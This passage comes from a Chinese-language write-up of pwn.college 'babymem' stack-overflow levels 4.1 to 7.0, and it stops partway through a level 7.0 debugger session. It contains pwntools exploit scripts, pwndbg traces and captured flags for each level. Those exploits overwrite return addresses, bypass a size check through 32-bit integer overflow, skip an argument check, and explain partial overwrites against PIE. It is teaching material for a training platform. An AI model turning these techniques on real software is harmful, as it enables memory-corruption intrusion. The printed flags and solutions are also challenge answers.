01:0008│-068     0x7fffffffd148 —▸ 0x7fffffffe318 —▸ 0x7fffffffe6f1 ◂— 'SHELL=/usr/bin/zsh'
02:0010│-060     0x7fffffffd150 —▸ 0x7fffffffe308 —▸ 0x7fffffffe6bb ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-4-1'
03:0018│-058     0x7fffffffd158 ◂— 0x10000000a /* '\n' */
04:0020│-050     0x7fffffffd160 —▸ 0x7ffff7f8d5c0 (_IO_2_1_stdout_) ◂— 0xfbad2887
05:0028│-048     0x7fffffffd168 ◂— 0x1000404020 /* ' @@' */
06:0030│ rax rsi 0x7fffffffd170 ◂— 0
07:0038│-038     0x7fffffffd178 ◂— 0
────────────────────────────────────[ BACKTRACE ]────────────────────────────────────
 ► 0         0x4018d4 challenge+201
   1         0x4019e7 main+198
   2   0x7ffff7dcae08
   3   0x7ffff7dcaecc __libc_start_main+140
   4         0x4011de _start+46
─────────────────────────────────────────────────────────────────────────────────────
pwndbg> i frame
Stack level 0, frame at 0x7fffffffd1c0:
 rip = 0x4018d4 in challenge; saved rip = 0x4019e7
 called by frame at 0x7fffffffe1f0
 Arglist at 0x7fffffffd1b0, args:
 Locals at 0x7fffffffd1b0, Previous frame's sp is 0x7fffffffd1c0
 Saved registers:
  rbp at 0x7fffffffd1b0, rip at 0x7fffffffd1b8
pwndbg> distance 0x7fffffffd170 0x7fffffffd1b8
0x7fffffffd170->0x7fffffffd1b8 is 0x48 bytes (0x9 words)

Exploit

#!/usr/bin/python3

from pwn import context, ELF, process, remote, gdb, p64

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-4-1"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
c
"""


def launch(local=True, debug=False):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug([elf.path], gdbscript=gdbscript)
        else:
            return process([elf.path])
    else:
        return remote(HOST, PORT)


target = launch()

payload = b"".ljust(0x48, b"A") + p64(0x401704)

target.recvuntil(b"Payload size: ")
target.sendline(b"-1")
target.recvuntil(b"Send your payload")
target.send(payload)

target.recvall()

Flag

Flag: pwn.college{M-FCJzqtx7cmDX7yqpyi7jADAMM.0lN5IDL5cTNxgzW}

Level 5.0

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time bypass another check designed to prevent you from doing so!

Write-up

__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3)
{
  int *v3; // rax
  char *v4; // rax
  _QWORD v6[3]; // [rsp+0h] [rbp-B0h] BYREF
  int v7; // [rsp+1Ch] [rbp-94h]
  unsigned int v8; // [rsp+28h] [rbp-88h] BYREF
  unsigned int v9; // [rsp+2Ch] [rbp-84h] BYREF
  _QWORD v10[12]; // [rsp+30h] [rbp-80h] BYREF
  __int16 v11; // [rsp+90h] [rbp-20h]
  int v12; // [rsp+9Ch] [rbp-14h]
  size_t nbytes; // [rsp+A0h] [rbp-10h]
  void *buf; // [rsp+A8h] [rbp-8h]
  __int64 savedregs; // [rsp+B0h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+B8h] [rbp+8h] BYREF

  v7 = a1;
  v6[2] = a2;
  v6[1] = a3;
  memset(v10, 0, sizeof(v10));
  v11 = 0;
  buf = v10;
  nbytes = 0LL;
  puts("The challenge() function has just been launched!");
  sp_ = (__int64)v6;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v6) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
  DUMP_STACK(sp_, sz_);
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
  puts("including the saved base pointer and the saved return address, for a");
  printf("total of %d bytes.\n", 8 * sz_);
  printf("The input buffer begins at %p, partway through the stack frame,\n", buf);
  puts("(\"above\" it in the stack are other local variables used by the function).");
  puts("Your input will be read into this buffer.");
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 98);
  puts("large input length, and thus overflow the buffer.\n");
  puts("In this level, there is no \"win\" variable.");
  puts("You will need to force the program to execute the win() function");
  puts("by directly overflowing into the stored return address back to main,");
  printf(
    "which is stored at %p, %d bytes after the start of your input buffer.\n",
    (const void *)rp_,
    rp_ - (_DWORD)buf);
  printf(
    "That means that you will need to input at least %d bytes (%d to fill the buffer,\n",
    rp_ - (_DWORD)buf + 8,
    98);
  printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)buf - 98);
  puts("and 8 that will overwrite the return address).\n");
  puts("We have disabled the following standard memory corruption mitigations for this challenge:");
  puts("- the canary is disabled, otherwise you would corrupt it before");
  puts("overwriting the return address, and the program would abort.");
  puts("- the binary is *not* position independent. This means that it will be");
  puts("located at the same spot every time it is run, which means that by");
  puts("analyzing the binary (using objdump or reading this output), you can");
  puts("know the exact value that you need to overwrite the return address with.\n");
  puts("This challenge will let you send multiple payload records concatenated together.");
  puts("It will make sure that the total payload size fits in the allocated buffer");
  puts("on the stack. Can you send a carefully crafted input to break this calculation?");
  printf("Number of payload records to send: ");
  __isoc99_scanf("%u", &v9);
  if ( !v9 )
    __assert_fail("record_num > 0", "/challenge/babymem-level-5-0.c", 0x8Fu, "challenge");
  printf("Size of each payload record: ");
  __isoc99_scanf("%u", &v8);
  if ( !v8 )
    __assert_fail("record_size > 0", "/challenge/babymem-level-5-0.c", 0x92u, "challenge");
  if ( v8 * v9 > 0x62 )
    __assert_fail("record_size * record_num <= 98", "/challenge/babymem-level-5-0.c", 0x93u, "challenge");
  nbytes = v8 * (unsigned __int64)v9;
  printf("Computed total payload size: %lu\n", nbytes);
  printf("You have chosen to send %lu bytes of input!\n", nbytes);
  printf("This will allow you to write from %p (the start of the input buffer)\n", buf);
  printf(
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
    (char *)buf + nbytes,
    nbytes - 98);
  printf("Of these, you will overwrite %d bytes into the return address.\n", nbytes + (_DWORD)buf - rp_);
  puts("If that number is greater than 8, you will overwrite the entire return address.\n");
  puts("You will want to overwrite the return value from challenge()");
  printf("(located at %p, %d bytes past the start of the input buffer)\n", (const void *)rp_, rp_ - (_DWORD)buf);
  printf("with %p, which is the address of the win() function.\n", win);
  puts("This will cause challenge() to return directly into the win() function,");
  puts("which will in turn give you the flag.");
  puts("Keep in mind that you will need to write the address of the win() function");
  puts("in little-endian (bytes backwards) so that it is interpreted properly.\n");
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
  v12 = read(0, buf, nbytes);
  if ( v12 < 0 )
  {
    v3 = __errno_location();
    v4 = strerror(*v3);
    printf("ERROR: Failed to read input -- %s!\n", v4);
    exit(1);
  }
  printf("You sent %d bytes!\n", v12);
  puts("Let's see what happened with the stack:\n");
  DUMP_STACK(sp_, sz_);
  puts("The program's memory status:");
  printf("- the input buffer starts at %p\n", buf);
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
  printf("- the address of win() is %p.\n", win);
  putchar(10);
  puts("If you have managed to overwrite the return address with the correct value,");
  puts("challenge() will jump straight to win() when it returns.");
  printf("Let's try it now!\n\n");
  puts("Goodbye!");
  return 0LL;
}

首先，两个 __isoc99_scanf 都读取无符号数，易想到补码性质和隐式转换问题。其次，读取输入后两条 if 分别判断两个 __isoc99_scanf 输入是否等于零，为零就断言失败。最后，不能满足 v8 * v9 > 0x62 这条判断，也就是输入的两个有符号数相乘（通过反汇编得知这里的乘法使用 imul）的结果必须小于等于 98，否则也会断言失败。

通过程序给出的提示信息我们已经知道 payload 的大小为 144 bytes，所以我们要做的就是想办法满足在 v8 * v9 > 0x62 不成立的前提下获得起码 144 bytes 的输入大小。因为最后 read 的输入的大小是通过 nbytes = v8 * (unsigned __int64)v9; 设置的，所以我们只要关注 v8、v9 的选择。

如果我们输入两个 -1，那确实绕过了 v8 * v9 > 0x62。但是调试发现 nbytes 超出 ssize_t 的大小（显然 0xfffffffe00000001 > 2**63-1）会导致 read 不会读取任何数据，直接返回 -1，最后程序抛出异常并退出：

pwndbg> c
Continuing.

Breakpoint 2, 0x000000000040291c in challenge ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
*RAX  0x7ffd77ce3510 ◂— 0
 RBX  0x7ffd77ce46e8 —▸ 0x7ffd77ce55a2 ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-5-0'
 RCX  0
*RDX  0xfffffffe00000001
*RDI  0
*RSI  0x7ffd77ce3510 ◂— 0
*R8   0x75
*R9   0xffffffec
 R10  0
*R11  0x202
 R12  1
 R13  0
 R14  0x796eb2ce0000 (_rtld_global) —▸ 0x796eb2ce12e0 ◂— 0
 R15  0
 RBP  0x7ffd77ce3590 —▸ 0x7ffd77ce45c0 —▸ 0x7ffd77ce4660 —▸ 0x7ffd77ce46c0 ◂— 0
 RSP  0x7ffd77ce34e0 ◂— 0xa /* '\n' */
*RIP  0x40291c (challenge+1342) ◂— call 0x401170
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
 ► 0x40291c <challenge+1342>    call   read@plt                    <read@plt>
        fd: 0 (pipe:[419970])
        buf: 0x7ffd77ce3510 ◂— 0
        nbytes: 0xfffffffe00000001

   0x402921 <challenge+1347>    mov    dword ptr [rbp - 0x14], eax
   0x402924 <challenge+1350>    cmp    dword ptr [rbp - 0x14], 0
   0x402928 <challenge+1354>    jns    challenge+1400              <challenge+1400>

   0x40292a <challenge+1356>    call   __errno_location@plt        <__errno_location@plt>

   0x40292f <challenge+1361>    mov    eax, dword ptr [rax]
   0x402931 <challenge+1363>    mov    edi, eax
   0x402933 <challenge+1365>    call   strerror@plt                <strerror@plt>

   0x402938 <challenge+1370>    mov    rsi, rax
   0x40293b <challenge+1373>    lea    rdi, [rip + 0x147e]     RDI => 0x403dc0 ◂— 'ERROR: Failed to read input -- %s!\n'
   0x402942 <challenge+1380>    mov    eax, 0                  EAX => 0
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp     0x7ffd77ce34e0 ◂— 0xa /* '\n' */
01:0008│-0a8     0x7ffd77ce34e8 —▸ 0x7ffd77ce46f8 —▸ 0x7ffd77ce55d8 ◂— 'MOTD_SHOWN=pam'
02:0010│-0a0     0x7ffd77ce34f0 —▸ 0x7ffd77ce46e8 —▸ 0x7ffd77ce55a2 ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-5-0'
03:0018│-098     0x7ffd77ce34f8 ◂— 0x100000000
04:0020│-090     0x7ffd77ce3500 —▸ 0x7ffd77ce3520 ◂— 0
05:0028│-088     0x7ffd77ce3508 ◂— 0xffffffffffffffff
06:0030│ rax rsi 0x7ffd77ce3510 ◂— 0
07:0038│-078     0x7ffd77ce3518 ◂— 0
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0         0x40291c challenge+1342
   1         0x402b32 main+198
   2   0x796eb2aade08
   3   0x796eb2aadecc __libc_start_main+140
   4         0x4011fe _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> c
Continuing.

Breakpoint 3, 0x0000000000402921 in challenge ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
*RAX  0xffffffffffffffff
 RBX  0x7ffd77ce46e8 —▸ 0x7ffd77ce55a2 ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-5-0'
*RCX  0x796eb2b93c21 (read+17) ◂— cmp rax, -0x1000 /* 'H=' */
*RDX  0xffffffffffffff88
 RDI  0
 RSI  0x7ffd77ce3510 ◂— 0
 R8   0x75
 R9   0xffffffec
 R10  0
*R11  0x246
 R12  1
 R13  0
 R14  0x796eb2ce0000 (_rtld_global) —▸ 0x796eb2ce12e0 ◂— 0
 R15  0
 RBP  0x7ffd77ce3590 —▸ 0x7ffd77ce45c0 —▸ 0x7ffd77ce4660 —▸ 0x7ffd77ce46c0 ◂— 0
 RSP  0x7ffd77ce34e0 ◂— 0xa /* '\n' */
*RIP  0x402921 (challenge+1347) ◂— mov dword ptr [rbp - 0x14], eax
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
   0x40291c <challenge+1342>    call   read@plt                    <read@plt>

 ► 0x402921 <challenge+1347>    mov    dword ptr [rbp - 0x14], eax     [0x7ffd77ce357c] => 0xffffffff
   0x402924 <challenge+1350>    cmp    dword ptr [rbp - 0x14], 0       0xffffffff - 0x0     EFLAGS => 0x286 [ cf PF af zf SF IF df of ]
   0x402928 <challenge+1354>    jns    challenge+1400              <challenge+1400>

   0x40292a <challenge+1356>    call   __errno_location@plt        <__errno_location@plt>

   0x40292f <challenge+1361>    mov    eax, dword ptr [rax]
   0x402931 <challenge+1363>    mov    edi, eax
   0x402933 <challenge+1365>    call   strerror@plt                <strerror@plt>

   0x402938 <challenge+1370>    mov    rsi, rax
   0x40293b <challenge+1373>    lea    rdi, [rip + 0x147e]     RDI => 0x403dc0 ◂— 'ERROR: Failed to read input -- %s!\n'
   0x402942 <challenge+1380>    mov    eax, 0                  EAX => 0
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffd77ce34e0 ◂— 0xa /* '\n' */
01:0008│-0a8 0x7ffd77ce34e8 —▸ 0x7ffd77ce46f8 —▸ 0x7ffd77ce55d8 ◂— 'MOTD_SHOWN=pam'
02:0010│-0a0 0x7ffd77ce34f0 —▸ 0x7ffd77ce46e8 —▸ 0x7ffd77ce55a2 ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-5-0'
03:0018│-098 0x7ffd77ce34f8 ◂— 0x100000000
04:0020│-090 0x7ffd77ce3500 —▸ 0x7ffd77ce3520 ◂— 0
05:0028│-088 0x7ffd77ce3508 ◂— 0xffffffffffffffff
06:0030│ rsi 0x7ffd77ce3510 ◂— 0
07:0038│-078 0x7ffd77ce3518 ◂— 0
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0         0x402921 challenge+1347
   1         0x402b32 main+198
   2   0x796eb2aade08
   3   0x796eb2aadecc __libc_start_main+140
   4         0x4011fe _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>

查看 read 的定义，让我忍不住想吐槽这奇葩的设计：为了能够返回有符号数错误码，返回值类型被设置为 ssize_t，但是可接收的最大输入值类型为 size_t。显然 ssize_t < size_t，也就是说我们提供的输入大小可能超出返回值（输入进去的数据的大小）的可承载范围，如果超出了就抛出 -1。但又没有办法做到返回值类型和最大输入类型的匹配，如果返回值类型改成 size_t 就会出现错误码和输入大小混淆的问题；如果最大输入大小类型改成 ssize_t 又很不合理，因为我们显然不能输入大小为负的内容。

// attributes: thunk
ssize_t read(int fd, void *buf, size_t nbytes)
{
  return read(fd, buf, nbytes);
}

言归正传，既然我们不能通过最方便的两个 -1 解决问题，那么下面就思考一下整数溢出的其它特点。

我们注意到在判断 v8 * v9 > 0x62 的时候做的都是 32 bits 运算：

 ► 0x40277d <challenge+927>    mov    edx, dword ptr [rbp - 0x88]     EDX, [0x7ffcfb641768] => 0xffffffff
   0x402783 <challenge+933>    mov    eax, dword ptr [rbp - 0x84]     EAX, [0x7ffcfb64176c] => 0xffffffff
   0x402789 <challenge+939>    imul   eax, edx
   0x40278c <challenge+942>    cmp    eax, 0x62                       0x1 - 0x62     EFLAGS => 0x297 [ CF PF AF zf SF IF df of ]
   0x40278f <challenge+945>  ✔ jbe    challenge+978               <challenge+978>

两个 -1 行不通是因为它们相乘得到的无符号结果太大了，超出了 ssize_t 的可容纳范围。那有没有两个数可以在绕过 v8 * v9 > 0x62 且乘积的无符号表示大小不低于 144 的前提下又保证处于 ssize_t 的范围呢？

如果我们提供的输入是 INT32_MAX，或者 INT32_MIN，和 2，或其它任何满足 (v8 * v9) & 0xffffffff == 0x0 的一对数，就可以巧妙的绕过 v8 * v9 > 0x62 的判断了！

这用到了整数溢出的原理，INT32_MAX * 2 或者 INT32_MIN * 2 都会溢出到更高位，低位就变成 0 了。而我们在做判断的时候只使用了低 32 bits，不关心高位的情况，那么只要让低 32 bits 的大小小于等于 0x62 即可。

Exploit

#!/usr/bin/python3

from pwn import context, ELF, process, remote, gdb, p64

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-5-0"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
b *challenge+927
b *challenge+1326
b *challenge+1342
b *challenge+1347
c
"""


def launch(local=True, debug=False):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug([elf.path], gdbscript=gdbscript)
        else:
            return process([elf.path])
    else:
        return remote(HOST, PORT)


target = launch(debug=False)

payload = b"".ljust(136, b"A") + p64(0x4022D7)

INT32_MAX = str((2**31)).encode()

target.recvuntil(b"Number of payload records to send: ")
target.sendline(INT32_MAX)
target.recvuntil(b"Size of each payload record: ")
target.sendline(b"2")
target.sendline(payload)

target.recvall()

Flag

Flag: pwn.college{AcH-0L9UpmOONC81mhni9OzJVhD.01N5IDL5cTNxgzW}

Level 5.1

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time bypass another check designed to prevent you from doing so!

Write-up

__int64 challenge()
{
  int *v0; // rax
  char *v1; // rax
  unsigned int v3; // [rsp+28h] [rbp-98h] BYREF
  unsigned int v4; // [rsp+2Ch] [rbp-94h] BYREF
  _QWORD v5[14]; // [rsp+30h] [rbp-90h] BYREF
  int v6; // [rsp+A0h] [rbp-20h]
  __int16 v7; // [rsp+A4h] [rbp-1Ch]
  char v8; // [rsp+A6h] [rbp-1Ah]
  int v9; // [rsp+ACh] [rbp-14h]
  size_t nbytes; // [rsp+B0h] [rbp-10h]
  void *buf; // [rsp+B8h] [rbp-8h]

  memset(v5, 0, sizeof(v5));
  v6 = 0;
  v7 = 0;
  v8 = 0;
  buf = v5;
  nbytes = 0LL;
  printf("Number of payload records to send: ");
  __isoc99_scanf("%u", &v4);
  if ( !v4 )
    __assert_fail("record_num > 0", "/challenge/babymem-level-5-1.c", 0x49u, "challenge");
  printf("Size of each payload record: ");
  __isoc99_scanf("%u", &v3);
  if ( !v3 )
    __assert_fail("record_size > 0", "/challenge/babymem-level-5-1.c", 0x4Cu, "challenge");
  if ( v3 * v4 > 0x77 )
    __assert_fail("record_size * record_num <= 119", "/challenge/babymem-level-5-1.c", 0x4Du, "challenge");
  nbytes = v3 * (unsigned __int64)v4;
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
  v9 = read(0, buf, nbytes);
  if ( v9 < 0 )
  {
    v0 = __errno_location();
    v1 = strerror(*v0);
    printf("ERROR: Failed to read input -- %s!\n", v1);
    exit(1);
  }
  puts("Goodbye!");
  return 0LL;
}

不写了不写了，和上一题思路一样，自己去调试查 win 地址和 padding 大小就好啦～

Exploit

#!/usr/bin/python3

from pwn import context, ELF, process, remote, gdb, p64

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-5-1"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
c
"""


def launch(local=True, debug=False):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug([elf.path], gdbscript=gdbscript)
        else:
            return process([elf.path])
    else:
        return remote(HOST, PORT)


target = launch()

payload = b"".ljust(0x98, b"A") + p64(0x401A48)

INT32_MAX = str((2**31)).encode()

target.recvuntil(b"Number of payload records to send: ")
target.sendline(INT32_MAX)
target.recvuntil(b"Size of each payload record: ")
target.sendline(b"2")
target.sendline(payload)

target.recvall()

Flag

Flag: pwn.college{A2rdZkIDLVjvpTrAPvlwpllVi7m.0FO5IDL5cTNxgzW}

Level 6.0

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time bypass another check designed to prevent you from doing so!

Write-up

void __fastcall win_authed(int a1)
{
  int *v1; // rax
  char *v2; // rax
  int *v3; // rax
  char *v4; // rax

  if ( a1 == 0x1337 )
  {
    puts("You win! Here is your flag:");
    flag_fd_5715 = open("/flag", 0);
    if ( flag_fd_5715 < 0 )
    {
      v1 = __errno_location();
      v2 = strerror(*v1);
      printf("\n  ERROR: Failed to open the flag -- %s!\n", v2);
      if ( geteuid() )
      {
        puts("  Your effective user id is not 0!");
        puts("  You must directly run the suid binary in order to have the correct permissions!");
      }
      exit(-1);
    }
    flag_length_5716 = read(flag_fd_5715, &flag_5714, 0x100uLL);
    if ( flag_length_5716 <= 0 )
    {
      v3 = __errno_location();
      v4 = strerror(*v3);
      printf("\n  ERROR: Failed to read the flag -- %s!\n", v4);
      exit(-1);
    }
    write(1, &flag_5714, flag_length_5716);
    puts("\n");
  }
}

思路是覆盖返回地址，返回到 win_authed。但是由于 win_authed 会先检查传入参数是否为 0x1337，匹配才给 flag，所以我们光返回到 win_authed 还不够。要么想办法传入参数 0x1337，要么返回到 if 判断之后的指令，直接跳过执行判断的部分。这里我们使用第二种方法。

void __fastcall win_authed(int a1)
{
  if ( a1 == 0x1337 ) { /* ... */ }
}

pwndbg> disass win_authed
Dump of assembler code for function win_authed:
   0x0000000000401987 <+0>: endbr64
   0x000000000040198b <+4>: push   rbp
   0x000000000040198c <+5>: mov    rbp,rsp
   0x000000000040198f <+8>: sub    rsp,0x10
   0x0000000000401993 <+12>: mov    DWORD PTR [rbp-0x4],edi
   0x0000000000401996 <+15>: cmp    DWORD PTR [rbp-0x4],0x1337
   0x000000000040199d <+22>: jne    0x401aa1 <win_authed+282>
   0x00000000004019a3 <+28>: lea    rdi,[rip+0x1746]        # 0x4030f0
   0x00000000004019aa <+35>: call   0x401110 <puts@plt>
   0x00000000004019af <+40>: mov    esi,0x0
   0x00000000004019b4 <+45>: lea    rdi,[rip+0x1751]        # 0x40310c
   0x00000000004019bb <+52>: mov    eax,0x0
   0x00000000004019c0 <+57>: call   0x401170 <open@plt>
   0x00000000004019c5 <+62>: mov    DWORD PTR [rip+0x4675],eax        # 0x406040 <flag_fd.5715>
   0x00000000004019cb <+68>: mov    eax,DWORD PTR [rip+0x466f]        # 0x406040 <flag_fd.5715>
   0x00000000004019d1 <+74>: test   eax,eax
   0x00000000004019d3 <+76>: jns    0x401a22 <win_authed+155>
   0x00000000004019d5 <+78>: call   0x401100 <__errno_location@plt>
   0x00000000004019da <+83>: mov    eax,DWORD PTR [rax]
   0x00000000004019dc <+85>: mov    edi,eax
   0x00000000004019de <+87>: call   0x4011a0 <strerror@plt>
   0x00000000004019e3 <+92>: mov    rsi,rax
   0x00000000004019e6 <+95>: lea    rdi,[rip+0x172b]        # 0x403118
   0x00000000004019ed <+102>: mov    eax,0x0
   0x00000000004019f2 <+107>: call   0x401130 <printf@plt>
   0x00000000004019f7 <+112>: call   0x401140 <geteuid@plt>
   0x00000000004019fc <+117>: test   eax,eax
   0x00000000004019fe <+119>: je     0x401a18 <win_authed+145>
   0x0000000000401a00 <+121>: lea    rdi,[rip+0x1741]        # 0x403148
   0x0000000000401a07 <+128>: call   0x401110 <puts@plt>
   0x0000000000401a0c <+133>: lea    rdi,[rip+0x175d]        # 0x403170
   0x0000000000401a13 <+140>: call   0x401110 <puts@plt>
   0x0000000000401a18 <+145>: mov    edi,0xffffffff
   0x0000000000401a1d <+150>: call   0x401190 <exit@plt>
   0x0000000000401a22 <+155>: mov    eax,DWORD PTR [rip+0x4618]        # 0x406040 <flag_fd.5715>
   0x0000000000401a28 <+161>: mov    edx,0x100
   0x0000000000401a2d <+166>: lea    rsi,[rip+0x462c]        # 0x406060 <flag.5714>
   0x0000000000401a34 <+173>: mov    edi,eax
   0x0000000000401a36 <+175>: call   0x401150 <read@plt>
   0x0000000000401a3b <+180>: mov    DWORD PTR [rip+0x471f],eax        # 0x406160 <flag_length.5716>
   0x0000000000401a41 <+186>: mov    eax,DWORD PTR [rip+0x4719]        # 0x406160 <flag_length.5716>
   0x0000000000401a47 <+192>: test   eax,eax
   0x0000000000401a49 <+194>: jg     0x401a77 <win_authed+240>
   0x0000000000401a4b <+196>: call   0x401100 <__errno_location@plt>
   0x0000000000401a50 <+201>: mov    eax,DWORD PTR [rax]
   0x0000000000401a52 <+203>: mov    edi,eax
   0x0000000000401a54 <+205>: call   0x4011a0 <strerror@plt>
   0x0000000000401a59 <+210>: mov    rsi,rax
   0x0000000000401a5c <+213>: lea    rdi,[rip+0x1765]        # 0x4031c8
   0x0000000000401a63 <+220>: mov    eax,0x0
   0x0000000000401a68 <+225>: call   0x401130 <printf@plt>
   0x0000000000401a6d <+230>: mov    edi,0xffffffff
   0x0000000000401a72 <+235>: call   0x401190 <exit@plt>
   0x0000000000401a77 <+240>: mov    eax,DWORD PTR [rip+0x46e3]        # 0x406160 <flag_length.5716>
   0x0000000000401a7d <+246>: cdqe
   0x0000000000401a7f <+248>: mov    rdx,rax
   0x0000000000401a82 <+251>: lea    rsi,[rip+0x45d7]        # 0x406060 <flag.5714>
   0x0000000000401a89 <+258>: mov    edi,0x1
   0x0000000000401a8e <+263>: call   0x401120 <write@plt>
   0x0000000000401a93 <+268>: lea    rdi,[rip+0x1758]        # 0x4031f2
   0x0000000000401a9a <+275>: call   0x401110 <puts@plt>
   0x0000000000401a9f <+280>: jmp    0x401aa2 <win_authed+283>
   0x0000000000401aa1 <+282>: nop
   0x0000000000401aa2 <+283>: leave
   0x0000000000401aa3 <+284>: ret
End of assembler dump.
pwndbg>

Exploit

#!/usr/bin/python3

from pwn import context, ELF, process, remote, gdb, p64

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-6-0"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
c
"""


def launch(local=True, debug=False):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug([elf.path], gdbscript=gdbscript)
        else:
            return process([elf.path])
    else:
        return remote(HOST, PORT)


target = launch()

payload = b"".ljust(0x58, b"A") + p64(0x4019A3)
payload_size = str(len(payload)).encode()

target.recvuntil(b"Payload size: ")
target.sendline(payload_size)
target.recvuntil("Send your payload")
target.send(payload)

target.recvall()

Flag

Flag: pwn.college{AusQ-DCHaivq4M4Tj9IZIsDv7m8.0VO5IDL5cTNxgzW}

Level 6.1

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time bypass another check designed to prevent you from doing so!

Write-up

和上一题一样，只是需要计算一下 padding 大小和看一下返回到哪里，这里就不多赘述了。

Exploit

#!/usr/bin/python3

from pwn import context, ELF, process, remote, gdb, p64

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-6-1"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
c
"""


def launch(local=True, debug=False):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug([elf.path], gdbscript=gdbscript)
        else:
            return process([elf.path])
    else:
        return remote(HOST, PORT)


target = launch()

payload = b"".ljust(0x88, b"A") + p64(0x401DB0)
payload_size = str(len(payload)).encode()

target.recvuntil(b"Payload size: ")
target.sendline(payload_size)
target.recvuntil("Send your payload")
target.send(payload)

target.recvall()

Flag

Flag: pwn.college{Mlgp6gl7Ogp1vkjstLEXXOSldEM.0FMwMDL5cTNxgzW}

Level 7.0

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time in a position independent (PIE) binary!

Write-up

这题和前两题差不多，都是计算 padding 和覆盖返回地址，唯一的区别在于它启用了 PIE 保护，导致我们无法知道确切的返回地址。这里我们通过 Partial Write 的方式绕过 PIE。

Partial Write 利用了操作系统加载程序时总是将程序加载到随机的内存页，通常内存页是 0x1000 字节，4 KB 对齐的，也就是说程序内部指令的偏移量都不可能超出这个范围，不够就分配到下一个内存页，比如 0x2000。所以开启了 PIE 的程序，尽管每次运行都被分配到不同的内存页，但它们在内存页中的偏移地址，也就是最后 3 nibbles 始终是相同的。利用这一点，我们只需要覆盖这最后 3 nibbles 即可达到控制返回地址的效果。

但由于我们没办法写入半个字节，所以我们需要猜一个 nibble，范围是 [0x0, 0xf]。将它和固定的 3 nibbles 组合输入到程序，如果地址匹配就成功跳转了。

下面看看开启 PIE 后的效果（每次运行都会随机分配基地址，但最后 3 nibbles 偏移地址始终是固定的）。

Run 1:

pwndbg> piebase
Calculated VA from /home/cub3y0nd/Projects/pwn.college/babymem-level-7-0 = 0x6123056c8000
pwndbg> i fun main
All functions matching regular expression "main":

Non-debugging symbols:
0x00006123056ca3c3  main
0x00007149f9ca4e40  __libc_start_main
0x00007149f9cb4b70  bindtextdomain
0x00007149f9cb4bb0  bind_textdomain_codeset
0x00007149f9cb86b0  textdomain
0x00007149f9d026c0  _IO_switch_to_main_wget_area
0x00007149f9d8e0b0  getdomainname
0x00007149f9d95d00  setdomainname
0x00007149f9da4b90  __getdomainname_chk
0x00007149f9db6940  __res_nquerydomain
0x00007149f9db6940  res_nquerydomain
0x00007149f9db69f0  __res_querydomain
0x00007149f9db69f0  res_querydomain
pwndbg> i fun challenge
All functions matching regular expression "challenge":

Non-debugging symbols:
0x00006123056c9d0b  challenge
pwndbg> i fun win_authed
All functions matching regular expression "win_authed":

Non-debugging symbols:
0x00006123056c9bee  win_authed
pwndbg>

Run 2:

pwndbg> piebase
